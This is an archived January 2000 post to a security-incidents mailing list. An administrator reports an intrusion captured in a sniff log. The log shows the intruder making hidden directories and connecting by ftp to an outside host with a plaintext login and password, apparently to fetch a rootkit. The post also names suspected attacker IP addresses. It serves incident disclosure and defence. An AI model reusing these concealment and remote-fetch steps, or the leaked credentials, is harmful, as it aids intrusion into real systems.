Security Incidents mailing list archives
rootkit site found in sniff log (??)
From: filipg () CORONA EPS PITT EDU (Filip M. Gieszczykiewicz)
Date: Sun, 9 Jan 2000 05:29:29 -0500
I was looking throught he sniff log (only 2 days of data preserved) to e-mail the sysadmins of probed/cracked sites when I found this: --------- : ls : mkdir /^H.a : mkdir .a : cd .a : ftp ftp.xoom.com USER chrometnt PASS phorce31337 --------- Smells of a skript-kiddie... falls into his own latrine... --------- Registrant:____________________________________________ XOOM.com, Inc. (XOOM2-DOM)_____________________________ 300 Montgomery St., 3rd Floor_______________________ San Francisco, CA 94104_____________________________ Domain Name: XOOM.COM_______________________________ Administrative Contact, Technical Contact, Zone Cont Smith, Dave (DS8987) dave@XOOM.COM_____________ (415) 288-2500 (FAX) (415) 288-2580______________ Billing Contact:____________________________________ Administrator, Billing (AB401-ORG) billing@XOOM (415) 288-2500___________________________________ Fax- (415) 288-2580____________________________________ Record last updated on 12-Jul-1999._________________ Record created on 03-Dec-1996.______________________ Database last updated on 8-Jan-2000 12:47:34 EST.___ Domain servers in listed order:_____________________ NAME.ROC.FRONTIERNET.NET 209.130.187.10_____________ NAME.PHX.FRONTIERNET.NET 206.165.6.10_______________ NS1.XOOM.COM 206.132.185.58_____ NS2.XOOM.COM 206.132.185.59____ NS3.XOOM.COM 206.132.185.199__ --------- This was ON another host!! (local to us). I will be sending their full info into Pitt's security folks and to root@host. User(s) doing the connecting/cracking: Name: mel-0511-145.ports.iprimus.net.au Address: 202.138.39.145 *AND* Name: mel-0212-234.ports.iprimus.net.au Address: 203.134.25.234 *AND* Name: ppp-003.cust20.adl.chariot.net.au Address: 210.9.20.3 Cheers, Filip G. Filip "I'll buy a vowel" Gieszczykiewicz | http://www.repairfaq.org/ (filipg () corona eps pitt edu) I am the river itself and the leaf floating its currents. I am steering. I am swept. I am.
Current thread:
- Scanners using netcraft? Michael Damm (Jan 05)
- Re: Scanners using netcraft? Richard Trott (Jan 05)
- Re: Scanners using netcraft? Mike Johnson (Jan 05)
- Got cracked/attacked this morning Filip M. Gieszczykiewicz (Jan 08)
- god damn - we got rooted again (long, alas) Filip M. Gieszczykiewicz (Jan 09)
- rootkit site found in sniff log (??) Filip M. Gieszczykiewicz (Jan 09)
- Re: Scanners using netcraft? Al Huger - Mail Account (Jan 05)
- Port 3593 Raistlin (Jan 05)
- Re: Scanners using netcraft? sekurity (Jan 05)
- <Possible follow-ups>
- Re: Scanners using netcraft? Eric Cholet (Jan 05)
- Re: Scanners using netcraft? mea culpa (Jan 10)